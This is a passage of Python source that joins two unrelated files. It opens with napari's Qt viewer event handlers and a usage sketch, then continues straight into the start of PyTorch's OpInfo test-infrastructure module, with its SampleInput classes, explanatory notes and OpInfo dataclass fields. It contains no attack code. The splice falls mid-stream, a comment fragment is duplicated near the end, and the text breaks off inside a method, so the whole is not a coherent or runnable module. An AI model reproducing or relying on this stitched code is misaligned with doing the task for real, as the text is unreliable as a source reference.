Parameters ---------- event : qtpy.QtCore.QEvent """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_wheel_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_wheel_callbacks(layer, event) def on_mouse_press(self, event): """Called whenever mouse pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_press_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_press_callbacks(layer, event) def on_mouse_move(self, event): """Called whenever mouse moves over canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_move_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_move_callbacks(layer, event) def on_mouse_release(self, event): """Called whenever mouse released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_release_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_release_callbacks(layer, event) def on_key_press(self, event): """Called whenever key pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if ( event.native is not None and event.native.isAutoRepeat() and event.key.name not in ['Up', 'Down', 'Left', 'Right'] ) or event.key is None: # pass if no key is present or if key is held down, unless the # key being held down is one of the navigation keys # this helps for scrolling, etc. return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.press_key(combo) def on_key_release(self, event): """Called whenever key released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.key is None or ( # on linux press down is treated as multiple press and release event.native is not None and event.native.isAutoRepeat() ): return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.release_key(combo) def on_draw(self, event): """Called whenever the canvas is drawn. This is triggered from vispy whenever new data is sent to the canvas or the camera is moved and is connected in the `QtViewer`. """ scale_factor = self._canvas2world_scale if self.viewer.axes.visible: self.axes.update_scale(scale_factor) for layer in self.viewer.layers: if layer.ndim <= self.viewer.dims.ndim: layer._update_draw( scale_factor=scale_factor, corner_pixels=self._canvas_corners_in_world[ :, -layer.ndim : ], shape_threshold=self.canvas.size, ) def keyPressEvent(self, event): """Called whenever a key is pressed. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.canvas._backend._keyEvent(self.canvas.events.key_press, event) event.accept() def keyReleaseEvent(self, event): """Called whenever a key is released. 
        Parameters
        ----------
        event : qtpy.QtCore.QEvent
            Event from the Qt context.
        """
        self.canvas._backend._keyEvent(self.canvas.events.key_release, event)
        event.accept()

    def dragEnterEvent(self, event):
        """Ignore event if not dragging & dropping a file or URL to open.

        Using event.ignore() here allows the event to pass through the
        parent widget to its child widget, otherwise the parent widget
        would catch the event and not pass it on to the child widget.

        Parameters
        ----------
        event : qtpy.QtCore.QEvent
            Event from the Qt context.
        """
        if event.mimeData().hasUrls():
            event.accept()
        else:
            event.ignore()

    def dropEvent(self, event):
        """Add local files and web URLs with drag and drop.

        Parameters
        ----------
        event : qtpy.QtCore.QEvent
            Event from the Qt context.
        """
        shift_down = QGuiApplication.keyboardModifiers() & Qt.ShiftModifier
        filenames = []
        for url in event.mimeData().urls():
            if url.isLocalFile():
                filenames.append(url.toLocalFile())
            else:
                filenames.append(url.toString())
        self.viewer.open(filenames, stack=bool(shift_down))

    def closeEvent(self, event):
        """Cleanup and close.

        Parameters
        ----------
        event : qtpy.QtCore.QEvent
            Event from the Qt context.
        """
        self.layers.close()

        # if the viewer.QtDims object is playing an axis, we need to terminate
        # the AnimationThread before close, otherwise it will cause a segFault
        # or Abort trap. (calling stop() when no animation is occurring is
        # also not a problem)
        self.dims.stop()
        self.canvas.native.deleteLater()
        if self._console is not None:
            self.console.close()
        self.dockConsole.deleteLater()
        event.accept()


def viewbox_key_event(event):
    """ViewBox key event handler.

    Parameters
    ----------
    event : napari.utils.event.Event
        The napari event that triggered this method.
    """
    return
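
# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). In normal use
# napari.Viewer() constructs both the ViewerModel and this Qt view; the
# snippet below wires them together by hand instead. The import paths are
# assumed from the napari package layout at the time of writing, and a
# running Qt event loop is required.

if __name__ == '__main__':
    from qtpy.QtWidgets import QApplication

    from napari.components import ViewerModel

    app = QApplication([])
    # Build the model first, then hand it to the Qt view defined above.
    model = ViewerModel()
    qt_viewer = QtViewer(model)
    qt_viewer.show()
    app.exec_()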
from functools import wraps, partial from itertools import product, chain, islice import itertools import collections import copy from enum import Enum import operator import random import unittest import math import torch import numpy as np from torch._six import inf import collections.abc from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union, Iterable from dataclasses import dataclass, asdict from torchgen.utils import dataclass_repr from torch.testing import make_tensor from torch.testing._internal.common_dtype import ( _dispatch_dtypes, floating_types, floating_types_and, complex_types, floating_and_complex_types, floating_and_complex_types_and, all_types_and_complex_and, all_types_and, all_types_and_complex, integral_types_and, all_types, double_types, empty_types, complex_types_and, integral_types ) from torch.testing._internal.common_device_type import \ (onlyCUDA, onlyNativeDeviceTypes, disablecuDNN, skipCUDAIfNoMagma, skipCUDAIfNoMagmaAndNoCusolver, skipCUDAIfNoCusolver, skipCPUIfNoLapack, skipCPUIfNoFFT, skipCUDAIfRocm, skipCUDAIf, precisionOverride, skipCPUIfNoMklSparse, toleranceOverride, tol, has_cusolver) from torch.testing._internal.common_cuda import ( CUDA11OrLater, SM53OrLater, SM60OrLater, with_tf32_off, TEST_CUDNN, _get_torch_cuda_version, _get_magma_version) from torch.testing._internal.common_utils import \ (is_iterable_of_tensors, random_symmetric_matrix, random_symmetric_psd_matrix, make_fullrank_matrices_with_distinct_singular_values, random_symmetric_pd_matrix, make_symmetric_matrices, make_symmetric_pd_matrices, random_square_matrix_of_rank, TEST_WITH_ROCM, IS_WINDOWS, IS_MACOS, TEST_SCIPY, torch_to_numpy_dtype_dict, TEST_WITH_ASAN, GRADCHECK_NONDET_TOL, slowTest, noncontiguous_like, freeze_rng_state) import torch.testing._internal.opinfo_helper as opinfo_helper import torch._refs as refs # noqa: F401 import torch._refs.nn.functional import torch._refs.special import torch._prims as prims # noqa: F401 from torch.utils._pytree import tree_flatten from distutils.version import LooseVersion has_scipy_fft = False if TEST_SCIPY: from scipy import stats import scipy.spatial import scipy.special try: import scipy.fft has_scipy_fft = True except ModuleNotFoundError: pass # Reasonable testing sizes for dimensions L = 20 M = 10 S = 5 # Unique value to distinguish default from anything else _NOTHING = object() class DecorateInfo(object): """Describes which test, or type of tests, should be wrapped in the given decorators when testing an operator. Any test that matches all provided arguments will be decorated. 
    The decorators will only be applied if the active_if argument is True."""

    __slots__ = ['decorators', 'cls_name', 'test_name', 'device_type', 'dtypes', 'active_if']

    def __init__(self, decorators, cls_name=None, test_name=None, *,
                 device_type=None, dtypes=None, active_if=True):
        self.decorators = list(decorators) if isinstance(decorators, collections.abc.Sequence) else [decorators]
        self.cls_name = cls_name
        self.test_name = test_name
        self.device_type = device_type
        self.dtypes = dtypes
        self.active_if = active_if

        # Validate dtypes
        if self.dtypes is not None:
            for dtype in self.dtypes:
                assert isinstance(dtype, torch.dtype)

    def is_active(self, cls_name, test_name, device_type, dtype):
        return (
            self.active_if and
            (self.cls_name is None or self.cls_name == cls_name) and
            (self.test_name is None or self.test_name == test_name) and
            (self.device_type is None or self.device_type == device_type) and
            (self.dtypes is None or dtype in self.dtypes)
        )


# FIXME
# Note: historically the 'input' kwarg had to be a Tensor or TensorList, but we are trying
# to support scalar inputs, too. Some tests still depend on 'input' being a Tensor
# or TensorList, however.
class SampleInput(object):
    """Represents sample inputs to a function."""

    __slots__ = ['input', 'args', 'kwargs', 'output_process_fn_grad', 'broadcasts_input', 'name']

    def __init__(self, input, *, args=tuple(), kwargs=None, output_process_fn_grad=lambda x: x, broadcasts_input=False, name=""):
        # input is the first input to the op and is typically either a Tensor or TensorList (Sequence[Tensor]).
        # This follows the typical pattern where for Tensor inputs op(t, ...) = t.op(...).
        self.input = input
        self.args = args
        self.kwargs = kwargs if kwargs is not None else {}
        self.output_process_fn_grad = output_process_fn_grad
        self.name = name

        # Specifies if `self.input` is broadcasted or not,
        # given that the operator supports broadcasting.
        # This field is used to verify the behavior of the inplace variant.
        #
        # If a SampleInput is marked with `broadcasts_input=True`,
        # it is verified that we get a `RuntimeError` with this sample
        # and the inplace variant. Also inplace grad{grad} tests are skipped
        # for such inputs (as they will error out otherwise).
        self.broadcasts_input = broadcasts_input

    def _repr_helper(self, formatter):
        # Helper function to return the details of the SampleInput as `str`
        # It consolidates all the fields of SampleInput and allows formatting
        # the fields like `input`, `args`, etc with `formatter`
        # callable to customize the representation.
        # Look at `summary` method for example.
        arguments = [
            f'input={formatter(self.input)}',
            f'args={formatter(self.args)}',
            f'kwargs={formatter(self.kwargs)}',
            f'output_process_fn_grad={self.output_process_fn_grad}',
            f'broadcasts_input={self.broadcasts_input}',
            f'name={repr(self.name)}']

        return f'SampleInput({", ".join(a for a in arguments if a is not None)})'

    def __repr__(self):
        return self._repr_helper(lambda x: x)

    def summary(self):
        # Returns the SampleInput details in a more
        # friendly format.
        # It formats `Tensor` and `TensorList`
        # in a more condensed representation.
        def formatter(arg):
            # Format any instance of `Tensor` (standalone, in list, or in dict)
            # by Tensor[TensorShape]
            # Eg.
Tensor with shape (3, 4) is formatted as Tensor[3, 4] if isinstance(arg, torch.Tensor): shape = str(tuple(arg.shape)).replace('(', '').replace(')', '') return f"Tensor[{shape}]" elif isinstance(arg, dict): return {k: formatter(v) for k, v in arg.items()} elif is_iterable_of_tensors(arg): return "TensorList[" + ", ".join(map(formatter, arg)) + "]" elif isinstance(arg, (list, tuple)): # Handle list, tuple return "(" + ",".join(map(formatter, arg)) + ")" return repr(arg) return self._repr_helper(formatter) # Applies the transform f(t) -> t to each tensor and dtype in the SampleInput def transform(self, f): def tt(t): def _tt(t): with torch.no_grad(): return f(t) if isinstance(t, torch.Tensor): return _tt(t) elif isinstance(t, torch.dtype): return _tt(t) elif isinstance(t, list): return list(map(tt, t)) elif isinstance(t, tuple): return tuple(map(tt, t)) elif isinstance(t, dict): return {k: tt(v) for k, v in t.items()} else: return t sample_tt_input, tt_args, tt_kwargs = tt(self.input), tt(self.args), tt(self.kwargs) # Note the transformed SampleInput assumes metadata like output_process_fn_grad is still valid! return SampleInput( sample_tt_input, args=tt_args, kwargs=tt_kwargs, output_process_fn_grad=self.output_process_fn_grad, broadcasts_input=self.broadcasts_input, name=self.name + "_transformed") # Returns the NumPy version of the sample input object in the form of a tuple: (input, args, kwargs) # Converts tensors to ndarrays by calling .detach().cpu().numpy() on them # Converts dtypes by remapping them using torch_to_numpy_dtype_dict def numpy(self): def to_numpy(t): if isinstance(t, torch.Tensor): if t.dtype is torch.bfloat16: return t.detach().cpu().to(torch.float32).numpy() if t.dtype is torch.chalf: return t.detach().cpu().to(torch.cfloat).numpy() return t.detach().cpu().numpy() elif isinstance(t, torch.dtype): return torch_to_numpy_dtype_dict[t] return t return self.transform(to_numpy) def noncontiguous(self): def to_noncontiguous(t): if isinstance(t, torch.Tensor): return noncontiguous_like(t) elif isinstance(t, torch.dtype): return t return t return self.transform(to_noncontiguous) class ErrorInput(object): """ A SampleInput that will cause the operation to throw an error plus information about the resulting error. """ __slots__ = ['sample_input', 'error_type', 'error_regex'] def __init__(self, sample_input, *, error_type=RuntimeError, error_regex): self.sample_input = sample_input self.error_type = error_type self.error_regex = error_regex class AliasInfo(object): """Class holds alias information. For example, torch.abs -> torch.absolute, torch.Tensor.absolute, torch.Tensor.absolute_ """ def __init__(self, alias_name): self.name = alias_name self.op = _getattr_qual(torch, alias_name) self.method_variant = getattr(torch.Tensor, alias_name, None) self.inplace_variant = getattr(torch.Tensor, alias_name + "_", None) def __call__(self, *args, **kwargs): return self.op(*args, **kwargs) # Extension of getattr to support qualified names # e.g. 
_getattr_qual(torch, 'linalg.norm') -> torch.linalg.norm
def _getattr_qual(obj, name, default=_NOTHING):
    try:
        for path in name.split('.'):
            obj = getattr(obj, path)
        return obj
    except AttributeError:
        if default is not _NOTHING:
            return default
        else:
            raise


# test if a tensor is close to an integer
def close_to_int(x, eps=0.1):
    if x.is_complex():
        y = torch.abs(torch.view_as_complex(torch.frac(torch.view_as_real(x))))
    else:
        y = torch.abs(torch.frac(x))
    return (y < eps) | (y > (1 - eps))


NumericsFilter = collections.namedtuple('NumericsFilter', ['condition', 'safe_val'])


# Note [OpInfos]
# ~~~~~~~~~~~~~~
#
# The majority of this note was written shortly after the PyTorch 1.9 release.
# If you notice it's out-of-date or think it could be improved then please
# file an issue.
#
# See also: the OpInfo tracker (https://github.com/pytorch/pytorch/issues/54261)
# See also: "Writing Test Templates" in common_device_type.py to learn how to
#   parametrize a test template using OpInfos.
# See also: PyTorch's GitHub wiki on running and writing tests
#   https://github.com/pytorch/pytorch/wiki/Running-and-writing-tests
# See also: ModuleInfos, OpInfo's sister class, defined in common_modules.py
#
# An OpInfo is a collection of metadata related to a PyTorch operator. This
#   metadata is used to generate tests that validate properties of the operator,
#   like if it implements the correct gradient formula.
#
# WHY OPINFOS?
# ~~~~~~~~~~~~
#
# OpInfos are principally intended to do three things:
#
#   1) to allow systematic testing over all PyTorch's operators
#   2) to simplify operator testing by autogenerating many tests
#   3) to allow systems (like autograd, torchscript, fx, nnc...) to test
#      against every PyTorch operator
#
# All these goals are still a work in progress. Not every operator has an
#   OpInfo, and some operator tests that could be automatically generated
#   still have to be written manually.
#
# It's helpful to understand that OpInfos are both about test simplification and
#   modularity. PyTorch is a complicated framework with many interrelated systems,
#   too many for any one person to keep track of. An OpInfo can be thought of as the
#   interface between an operator implementer and those other systems. Instead of
#   requiring the implementer of torch.foo to understand how to test its forward
#   mode AD or NNC support, that's typically handled automatically just by
#   defining an OpInfo.
#
# It's often surprising to OpInfo writers that just implementing an OpInfo
#   typically can't verify an operator is actually implemented correctly:
#
# "If an OpInfo doesn't validate my op works as expected, what's the point
#   of it?"
#
# But the point is the above. OpInfos are intended to let you focus on testing
#   the operator logic you're familiar with instead of having to write tests for
#   how the operator interacts with each of PyTorch's many systems.
#
# And, OK, it turns out that SOMETIMES just writing an OpInfo DOES
#   validate your op works as expected, but that's only in special
#   cases. See below for details.
#
# WHAT'S AN OPINFO?
# ~~~~~~~~~~~~~~~~~
#
# So what is an OpInfo? It's a Python class that describes an operator's properties,
#   like which dtypes it supports on the CPU and whether it has any aliases.
#   These properties can be divided into three categories:
#
#   1) Metadata describing the operator, like the operator's name and if it
#      "supports" the out kwarg.
#   2) Test directives, like "skips" that tell the test suite to skip some
#      tests.
# 3) A "sample inputs" function that generates valid inputs for the operator. # # OpInfo attributes are described in more detail below. # # THE SAMPLE INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~ # # The "sample inputs" function merits special elaboration. This function is # crucial to testing with OpInfos. A typical OpInfo test has to treat the operator # as a black box. There's no structure for the test to understand or exploit. # Without "sample inputs" it wouldn't even know how to call the OpInfo's # operator. The sample input function saves the day by providing different # "SampleInputs" that can be used to call the operator. A sample input # function should have the following signature: # # def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs): # # And should return an iterable of SampleInputs (see the class description # above). Each SampleInput defines an "input", "args", "kwargs", an # "output_process_fn_grad" function, the "broadcasts_input" bool and a # "name". # # All the "sample_inputs" functions are invoked within a `torch.no_grad()` # environment for efficiency and correctness. As such remember to set the # "requires_grad" flag on the inputs **after** performing any transformations # on them. # # The "input" is the first argument to the operator, or the tensor that # the method or inplace variants of the operator should be called on, and # should be on the requested device, of the requested dtype, and its # requires_grad attribute should be set to the requires_grad argument. # # "args" should contain positional arguments, and "kwargs" keyword arguments. # # "output_process_fn_grad" has an interesting name. It's a function that maps # the operator's output (when given the input, args, and kwargs) to the # portion of the output to gradcheck. For example, consider an operator # like torch.linalg.slogdet # (https://pytorch.org/docs/master/generated/torch.linalg.slogdet.html). # This operator returns a tuple of two tensors, but the first tensor # cannot be backwarded through. Its "output_process_fn_grad" filters # this output tuple to just the second argument, which we can call backward # on. Functions that produce a single tensor can ignore this argument. # # "broadcasts_input" is a bool indicated if the SampleInput causes the operator # to broadcast the "input" argument. This is important for tests to understand # because inplace variants of operations throw a runtime error if they # would broadcast their input arguments, so tests that work with inplace # variants filter SampleInputs that broadcast their input. # # "name" is a string that's just used for debugging. It appears when printing # the SampleInput. # # Sample inputs are designed to be used with many tests, some # that are very time consuming, so they should be a small # set with small tensors. An elaborated set of sample inputs # can be specified using the "reference_inputs_func" attribute. # The "reference inputs" for an operation are an extended # set of sample inputs that can more exhausively test an # operator. They are used by only a few tests that are careful # not to take too long to run. Adding reference inputs # is highly encouraged! # # THE (OPTIONAL) ERROR INPUTS FUNCTION # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # OpInfos may optionally specify "error inputs" through an error function. If # specified test_errors in test_ops.py will call the op with these inputs # and validate that the desired error is thrown. 
#
# Error inputs automate a common testing pattern where multiple inputs are
#   passed to an operation and the errors they throw are reviewed. Tests
#   written in this style should be ported to the new OpInfo pattern.
#
# Error inputs are specified using the ErrorInputs class, which contains
#   a SampleInput (see above) and data about the expected error.
#
# OPINFO FILE ORGANIZATION
# ~~~~~~~~~~~~~~~~~~~~~~~~
#
# All OpInfos are currently defined in this file. Most OpInfo tests are defined
#   in test_ops.py, but some system-specific tests are defined in those
#   systems' test files, and subclass-specific tests are defined in the test
#   file that corresponds to that subclass (see below).
#   Expect a reorganization in the future.
#
# WHAT'S TESTED?
# ~~~~~~~~~~~~~~
#
# Every OpInfo in the op_db sequence has the following properties validated in
#   test_ops.py:
#
#   - that its supported dtypes are specified correctly
#   - that the operation produces the same results when called with noncontiguous inputs
#   - that it supports the out= argument properly (if it allows out=),
#       see https://github.com/pytorch/pytorch/wiki/Developer-FAQ#how-does-out-work-in-pytorch
#   - that it works with the conjugate view bit properly
#   - that its function, method, and inplace variants perform the same operation
#       (that is, that torch.add, torch.Tensor.add, and torch.Tensor.add_ all
#       do the same thing).
#   - that its inplace variant preserves the input's storage
#   - that its gradient formula is implemented correctly, and that it supports
#       gradgrad, complex grad, and forward mode AD properly for
#       the op's function and inplace variants (method variants are skipped
#       to reduce test time).
#   - that the operation performs the same operation when traced or scripted
#       using the jit
#   - that the operation is autodifferentiated by the jit as expected
#   - that the operator's aliases, if any, perform the same operation and that
#       the jit understands the alias
#   - that the operator throws the correct errors (if error_inputs is defined)
#   - that the operator produces the same results as a NumPy reference (if ref is defined)
#   - that the operator produces the same results as a NumPy reference on an extended
#       set of "reference inputs" (if both ref and reference_inputs_func are defined)
#       (NOTE: elementwise unary and elementwise binary OpInfos do this even if only
#       ref is defined, because they effectively autogenerate reference inputs)
#   - that the operator works on different CUDA devices
#
# Additional OpInfo tests are in test_jit_fuser_te.py, test_fx_experimental.py,
#   and test_fx.py. These tests validate that operators work with NNC and FX
#   as expected.
#
# For performance, some of the above tests may only run on the first
#   SampleInput returned by an OpInfo's sample input function.
#
# In addition to these tests, some subclasses (discussed in the next section)
#   define additional tests.
#
# Critically, as mentioned above, what's not necessarily tested is that the operator
#   works as expected. When implementing an OpInfo an engineer must still
#   typically write one or more tests validating the operator's behavior.
#   The exception to this is if reference testing is sufficient, or if
#   the operation belongs to an OpInfo subclass that has more exhaustive
#   operator testing. Elementwise unary and elementwise binary operators,
#   in particular, usually don't require additional testing beyond
#   writing an OpInfo.
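
# AN ILLUSTRATIVE SKETCH
# ~~~~~~~~~~~~~~~~~~~~~~
#
# The two functions below are a minimal, hypothetical sketch of the sample
#   inputs and error inputs patterns described above. They are not referenced
#   by any OpInfo in this file, and the operator "foo" (a tensor plus a dim
#   argument) is invented purely for illustration.

def _example_sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs):
    # Keep the set small: sample inputs are reused by many, sometimes slow, tests.
    for shape in ((S,), (S, S)):
        yield SampleInput(
            make_tensor(shape, device=device, dtype=dtype,
                        requires_grad=requires_grad),
            args=(0,))


def _example_error_inputs_foo(op_info, device, **kwargs):
    # Calling the hypothetical foo with an out-of-range dim should raise.
    t = make_tensor((S,), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(t, args=(42,)),
                     error_type=IndexError,
                     error_regex="Dimension out of range")
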
#
# OPINFO (SUB)CLASSES
# ~~~~~~~~~~~~~~~~~~~
#
# In addition to the OpInfo base class there are several specialized OpInfo
#   subclasses. For example, the UnaryUfuncInfo subclass is used for
#   unary elementwise operations. These operations have a common structure
#   that test_unary_ufuncs.py exploits with additional automated testing.
#   The automated testing in test_unary_ufuncs.py is so thorough, comparing
#   the operator to a NumPy reference function on a plethora of values, that
#   just implementing an OpInfo for a unary elementwise operation is often
#   sufficient testing.
#
# The ForeachFuncInfo is another OpInfo subclass that is hyper-specialized to a
#   unique class of operations. These OpInfos aren't included in the
#   op_db sequence and have their own tests.
#
# Other OpInfo subclasses, like SpectralFuncInfo, are just for convenience
#   when writing OpInfos.
#
# TESTING A NEW OPERATOR
# ~~~~~~~~~~~~~~~~~~~~~~
#
# If you're adding a new operator to any of the following namespaces:
#   - torch
#   - torch.fft
#   - torch.linalg
#   - torch.special
#   - torch.nn.functional
#   then you should typically add an OpInfo for it.
#
# As mentioned a couple of times above, implementing an OpInfo is not
#   usually sufficient testing (unless the operator is a unary or binary elementwise
#   operator). The OpInfo will only test the properties described in the
#   "WHAT'S TESTED" section. It DOES NOT necessarily verify that the operator is
#   implemented correctly.
#
# TIPS FOR WRITING AN OPINFO AND OPINFO TESTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Writing an OpInfo can be a little daunting. Since the point of an OpInfo is to
#   be consumed by a variety of systems it can be hard to understand how to
#   deal with test failures or how to set the OpInfo metadata properly.
#
# Before adding an OpInfo it helps to look at other OpInfos. A sample inputs
#   function must be defined, and the operator's dtypes must be specified.
#   Once that's done you should run the operator's tests in test_ops.py
#   (these can be filtered using the "-k" argument in pytest). Tests that
#   fail should provide an error message that describes what to change about
#   your OpInfo. You don't need to worry about changing an OpInfo's default
#   values unless a test yells at you.
#
# Similarly, if you're writing a test that consumes OpInfos then it's critical
#   your test provides a clear error message describing what to do when it
#   fails. You should not assume the OpInfo implementer is familiar with your
#   system.
#
# If you see a confusing error message while developing an OpInfo then please
#   file an issue describing what happened.
#
# This trial-and-error approach to writing an OpInfo can be frustrating,
#   but it's probably necessary as long as OpInfos don't require
#   learning about all the systems that consume them. One thing that can help
#   is the get_supported_dtypes() function defined in opinfo_helper.py. This
#   function can be used to programmatically specify the dtypes an operator
#   supports, and is especially useful if writing an OpInfo on a machine
#   without a CUDA device. See its documentation for more details.
#
# THE FUTURE OF OPINFOS AND OPINFO TESTING
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# In the future we expect OpInfo coverage to improve and cover
#   the great majority of PyTorch's (public) operators.
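
# A HYPOTHETICAL op_db ENTRY
# ~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# As a rough, hypothetical illustration of how the metadata described in this
#   note fits together, an op_db entry for a unary elementwise operator might
#   look something like the commented sketch below. It is kept as a comment
#   because the OpInfo dataclass is only defined after this point in the file,
#   and the names "foo" and sample_inputs_foo are invented:
#
#   UnaryUfuncInfo(
#       'foo',
#       ref=np.abs,  # NumPy reference function, if one exists
#       dtypes=floating_types_and(torch.half),
#       sample_inputs_func=sample_inputs_foo,
#       supports_forward_ad=True,
#       skips=(
#           # Example test directive: skip one test class on CPU only
#           DecorateInfo(unittest.skip("Skipped!"),
#                        'TestUnaryUfuncs', device_type='cpu'),
#       ),
#   )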
#
# Classes and methods for the operator database
@dataclass
class OpInfo(object):
    """Operator information and helper functions for acquiring it."""

    # the string name of the function
    name: str

    # An optional reference function that accepts ndarrays (AKA "NumPy arrays").
    # If given, the op will be compared with its reference on each of its sample inputs.
    ref: Callable = None

    # the following metadata describes the operator, its variants, and its aliases, if any

    # iterable of aliases, e.g. ("absolute",) for torch.abs
    aliases: Iterable = None

    # additional string to include in the test name
    # this is useful when an op needs multiple OpInfos,
    # like divide does, often because it's really several
    # different ops behind the scenes
    variant_test_name: str = ''

    # the function variant of the operation, populated as torch.<name> if None
    op: Callable = None

    # allows the method variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated method
    # - if a Callable, then that callable should be the method associated with this operation
    method_variant: Callable = _NOTHING

    # allows the inplace variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated inplace variant
    # - if a Callable, then that callable should be the inplace variant associated with this operation
    inplace_variant: Callable = _NOTHING

    # allows the operator variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated operator
    # - if a Callable, then that callable should be the operator associated with this operation
    operator_variant: Callable = _NOTHING

    # allows the inplace operator variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated inplace operator
    # - if a Callable, then that callable should be the inplace operator associated with this operation
    inplace_operator_variant: Callable = _NOTHING

    # the following metadata are test directives for skipping or modifying tests

    # information about which tests to skip
    skips: Tuple = tuple()

    # decorators to apply to generated tests
    decorators: Tuple = tuple()

    # the following are pointers to functions to generate certain classes of inputs

    # function to generate sample inputs with strided layouts
    sample_inputs_func: Callable = None

    # function to generate a more thorough set of sample inputs with strided layouts
    reference_inputs_func: Callable = None

    # function to generate inputs that will throw errors
    error_inputs_func: Callable = None

    # function to generate sample inputs with sparse coo layouts
    sample_inputs_sparse_coo_func: Callable = None

    # function to generate sample inputs with sparse csr layouts
    sample_inputs_sparse_csr_func: Callable = None

    # the following metadata relates to dtype support and is tested for correctness in test_ops.py

    # dtypes this function works with on the CPU,
    # inherited by other device types that don't specify their own dtypes
    dtypes: _dispatch_dtypes = None

    # the following dtypesIf... options override the dtypes value
    # on their respective device types
options override the dtypes value on their respective device types # dtypes this function is expected to work with on CUDA dtypesIfCUDA: _dispatch_dtypes = None # dtypes this function is expected to work with on ROCM dtypesIfROCM: _dispatch_dtypes = None # backward dtypes this function is expected to work with backward_dtypes: _dispatch_dtypes = None # backward dtypes this function is expected to work with on CUDA backward_dtypesIfCUDA: _dispatch_dtypes = None # backward dtypes this function is expected to work with on ROCM backward_dtypesIfROCM: _dispatch_dtypes = None # the following metadata describes the operators out= support # whether the op supports the out kwarg # defaults to True, if the op does not allow the out kwarg or # supports it incorrectly then test_out in test_ops.py should fail supports_out: bool = True # the following metadata relates to autograd support # whether the operation supports backward mode AD # if true, gradient correctness is tested in test_ops.py # using the op's sample inputs supports_autograd: bool = True # whether the op supports second order gradients # if true, gradgrad correctness is tested in test_ops.py # defaults to support_autograd's value # TODO: rename this to supports_bwgrad_bwgrad to be consistent with below supports_gradgrad: bool = None # whether the ops supports second order gradients via # forward-over-reverse. If True, forward-over-reverse gradgrad correctness # is tested. If False, test that forward grad is not implemented. # Defaults to False. supports_fwgrad_bwgrad: bool = False # whether the operation supports inplace autograd # if true, tested in test_ops.py # defaults to supports_autograd's value supports_inplace_autograd: bool = None # Whether the operation support forward mode AD # If the value is True, we check that the gradients are correct # If the value is False, we test that forward grad is not implemented supports_forward_ad: bool = False # wrapper function for gradcheck gradcheck_wrapper: Callable = lambda op, *args, **kwargs: op(*args, **kwargs) # whether to check batched grad when doing gradcheck # defaults to support_autograd's value check_batched_grad: bool = None # whether to check batched grad grad when doing gradgradcheck # default's to support_gradgrad's value check_batched_gradgrad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `supports_forward_ad` check_batched_forward_grad: bool = None # whether to check batched forward grad when doing gradcheck # defaults to the value of `check_batched_forward_grad` check_inplace_batched_forward_grad: bool = None # tolerance for nondeterminism while performing gradcheck gradcheck_nondet_tol: float = 0.0 # Whether to use the fast implmentation for gradcheck/gradgradcheck. # When set to None, defers to the default value provided by the wrapper # function around gradcheck (testing._internal.common_utils.gradcheck) gradcheck_fast_mode: bool = None # the following metadata relates to JIT support and is tested for correctness in test_ops.py # name of the corresponding aten:: operator aten_name: str = None # if this is a composite implicit autograd op, the decomposed op decomp_aten_name: Optional[str] = None # name of the corresponding aten:: operator for backwards aten_backward_name: Optional[str] = None # if a op's aten::node is expected to be symbolically autodiffed assert_autodiffed: bool = False # a list of strings with node names that are expected to be in a # DifferentiableGraph when autodiffed. 
Ex: ['aten::add', 'aten::mm'], # default is populated to be ['aten::(name of Python operator)'] autodiff_nonfusible_nodes: List[str] = None # a list of strings with node names that are expected to be in FusionGroups # inside of DifferentiableGraphs when this operation is autodiffed. # Ex: ['aten::add', 'aten::mm'], defaults to an empty list # Note: currently no ops use fusible nodes autodiff_fusible_nodes: List[str] = None # the following metadata relates to sparse support and is used in test_sparse.py # whether the op supports sparse inputs supports_sparse: bool = False # only run tracing tests supports_scripting: bool = True # the following metadata relates to sparse csr support and is used in test_sparse_csr.py # whether the op supports sparse csr inputs supports_sparse_csr: bool = False # the following metadata relates to complex support and is checked in test_ops.py test_conjugated_samples: bool = True test_neg_view: bool = True # assert that jit shape analysis fully propagates shape assert_jit_shape_analysis: bool = False # the following metadata relates to ExpandedWeights support and is checked in test_expanded_weights.py supports_expanded_weight: bool = False def __post_init__(self): self._original_opinfo_args = asdict(self).copy() assert self.dtypes is not None, "OpInfo for {0} has no dtypes!".format(self.name) dtypes_args = (self.dtypes, 